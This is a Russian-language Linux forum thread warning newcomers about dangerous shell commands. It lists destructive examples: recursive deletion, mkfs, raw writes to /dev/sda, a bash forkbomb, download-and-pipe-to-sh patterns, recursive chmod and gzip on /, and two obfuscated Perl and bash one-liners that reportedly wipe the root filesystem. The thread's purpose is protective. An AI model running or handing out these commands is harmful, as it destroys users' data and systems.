debian.org / О Debian Где взять Debian Поддержка Уголок разработчика Новости Wiki

Автор Тема: Будьте внимательны или опасные команды  (Прочитано 13783 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн Ghostdmn

  • Ленивы... Ай, лень допеча...
  • Topic Author
  • Сообщений: 854
  • Jabber: ghostdmn@jabber.cz
Настоятельно рекомендуем Вам, во избежание неприятных последствий, проверять путем открытия в gedit бинарных файлов, содержащихся в deb, так и самостоятельных, на отсутствие команд, содержащих:

Удаление. Удаляет все файлы, текущую директорию и все видимые файлы в текущей директории. По моему, достаточно ясно, почему эти команды опасны для запуска.

рм -рф в любых вариациях
rm -r .[^.]*

К сожалению, примеры вновь стали проявлятся. 27.05.2011 на сайте gnome-look.org был обнаружен deb-файл, устанавливающий, якобы, тему для рабочего стола. В директории Debian, как оказалось, содержался скрипт с вышеуказанной командой. Контент, конечно, удален, но полностью избежать подобных эксцессов не удастся. Будьте бдительны.

Переформатирование: Данные на устройстве указанном после команды mkfs будут уничтожены и заменены на чистую файловую систему.
mkfs
mkfs.ext3
mkfs.anything

Манипуляции с блочным устройством: "Сырые" данные будут записаны на блочное устройство. В большинстве случаев, это приведёт к полному затиранию файловой системы и потере всей информации:

any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: Запускает огромное количество процессов, до тех пор пока система не зависнет, принуждая вас сделать жёсткую перезагрузку, которая может привести к утрате, повреждению данных или другим ужасным последствиям. В Bourne-подобных оболочках, например такой как Bash: (Это выглядит действительно любопытно и провоцирующе)

:(){ :|:& };:
НаPerl:
fork while fork

Tar-бомбу: Кто-то просит вас распаковать tar архив в существующую директорию. Такой архив может содержать миллионы файлов или проникать в систему угадывая имена файлов. Вы должны взять за правило, распаковывать архивы только во вновь созданные директории.

Распаковывающуюся бомбу: Кто-то просит вас распаковать архив, который на первый взгляд выглядит легким для закачки. На самом деле это данные запакованные с высокой степенью сжатия и при распаковке они будут заполнять ваш жёсткий диск, раздуваясь на сотни гигабайт. Не берите данные с непроверенных источников

Скрипт командной оболочки: Кто-то даёт вам ссылку на скрипт командной оболочки для запуска. Он может содержать любые команды как неопасные, так и зловредные. Не запускайте код, полученный от людей, которым вы не доверяете.

wget http://какое-то_место/какой-то_файл
sh ./какой-то_файл
wget http://какое-то_место/какой-то_файл -O- | sh
Код компиляции: Кто-то даёт вам исходные коды и затем просит вам их откомпилировать. Очень просто спрятать вредоносный код где-нибудь внутри большого куска исходного кода и исходный код даёт атакующему гораздо больше возможностей для маскировки вредоносной информации. Не компилируйте и не запускайте откомпилированный код, если это не код хорошо известного приложения, полученный с доверенного сайта (например SourceForge или домашняя страница автора или сайт Debian.org)

Для начинающих пользователей это выглядит как "непонятный набор hex кодов", который так типичен для пробных версий. Как бы то ни было, на самом деле запускается команда рм -рф ~ / &, которая уничтожает вашу домашнюю директорию, если вы под обычным пользователем и все файлы, если вы под суперпользователем. Если вы можете различить команду в этом коде, значит вам не нужно читать эту тему. В противном случае, помните, что такие вещи могут встречаться в любых подобных кодах - будьте осторожны.

Ещё несколько опасных примеров.

Программа из одной строчки на Perl:
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Удаляет все каталоги в корневой директории!

Запускать под bash'ем из-под рута:

ISF=$(echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -');$ISF 2>/dev/null
Команда молча потрёт всю корневую партицию!


Лучшим решением будет установка из проверенных источников, так вы будете максимально обезопасены от неприятных последствий.

P.S. Убедительная просьба не испытывать команды "на прочность". Часть команд может и не работать, но все же...

И последнее. Помним, что применение подобных команд в отношении пользователей является, в соответствии в Уголовным Кодексом РФ, уголовно-наказуемым деянием (ст.ст.  273, 274 УК РФ), а на форуме карается полным лишением доступа
« Последнее редактирование: 22 Июнь 2012, 15:15:10 от Ghostdmn »
8Gb/GTX750Ti 2Gb/AMD FX(tm)-4300 Quad-Core Processor/HDD 1Tb Toshiba DT01ACA100
 
Пользователи, которые поблагодарили этот пост: BULATUS, alsoijw, _Semen1991_, iruff, amd_amd

Оффлайн eof

  • Сообщений: 135
Полезная тема.
Хочется добавить: если не знаете что делает та или иная команда, которую вам говорят выполнить, то постарайтесь узнать для чего она предназначена. Самое простое это обратиться к справочным страницам (man команда) по каждой из команд. Также может помочь запрос приведённой команды в поисковой системе.
Будьте бдительны. "Доверяй, но проверяй", пожалуй, лучшее что можно сказать по этому поводу.
 

Оффлайн saveriy

  • Сообщений: 266
Re: Будьте внимательны или опасные команды
« Ответ #2 : 04 Июнь 2011, 18:48:01 »
Ghostdmn, спасибо за столь внятную и очень полезную тему.
 

Оффлайн alsoijw

  • Fedora 25 GNOME 3 amd64
  • Сообщений: 1231
Re: Будьте внимательны или опасные команды
« Ответ #3 : 18 Декабрь 2014, 15:26:54 »
Вот ещё несколько:
Код: (bash) [Выделить]
sudo chmod / 777 -R
sudo gzip -rf /
chmod 0777 ~
А что, тут тоже r​m​ -r​f / запрещён, и показывается как рм -рф /? Зачем? Тут вроде не тупицы сидят.
Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?
 
Пользователи, которые поблагодарили этот пост: iruff

Оффлайн BULATUS

  • Сообщений: 1920
Re: Будьте внимательны или опасные команды
« Ответ #4 : 18 Декабрь 2014, 16:57:40 »
Тут вроде не тупицы сидят.
Тупиц нет. Где они я не знаю... но подозреваю, что командой может воспользоваться не только здешний обитатель, но и любой другой человек, нашедший эти символы по поиску в гугле и т.п. В оригинале команда не запрещена, а превентивно заменена. Расценивайте это профилактикой.  :)

Оффлайн alsoijw

  • Fedora 25 GNOME 3 amd64
  • Сообщений: 1231
Re: Будьте внимательны или опасные команды
« Ответ #5 : 18 Декабрь 2014, 17:45:38 »
рм -рф ~/.config/chromium. Систему вроде не ломает(я так хромиум в убунте чинил) но заменяется.
BULATUS, у меня по этому поводу небольшое недопонимание на форуме убунты случилось... Могу в ЛС ответить, если интересно.
Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?
 

Оффлайн alsoijw

  • Fedora 25 GNOME 3 amd64
  • Сообщений: 1231
Re: Будьте внимательны или опасные команды
« Ответ #6 : 27 Февраль 2015, 13:59:24 »
RedEye, а если ему ~ передать?
Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?
 

Оффлайн Leo

  • Сообщений: 843
  • Jabber: leo.bs@jabber.ru
Re: Будьте внимательны или опасные команды
« Ответ #7 : 28 Февраль 2015, 04:47:10 »
~ никому передавать не надо - тильда - домашний каталог пользователя  ;D

Оффлайн alsoijw

  • Fedora 25 GNOME 3 amd64
  • Сообщений: 1231
Re: Будьте внимательны или опасные команды
« Ответ #8 : 28 Февраль 2015, 13:40:54 »
Вот так
Цитировать
r​m -rf ~
Из под обычного юзера, но удалит файлы.

способов прострелить себе ногу много, не давайте невнимательным юзерам ещё один, ogost
« Последнее редактирование: 28 Февраль 2015, 18:10:19 от ogost »
Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?
 
Пользователи, которые поблагодарили этот пост: iruff

Оффлайн alsoijw

  • Fedora 25 GNOME 3 amd64
  • Сообщений: 1231
Мало видеть нам начало - надо видеть и конец. Если видишь ты создание - значит где-то есть ТВОРЕЦ
Многие жалуются: геометрия в жизни не пригодилась. Ямб от хорея им приходится отличать ежедневно?
 
Пользователи, которые поблагодарили этот пост: iruff

Теги: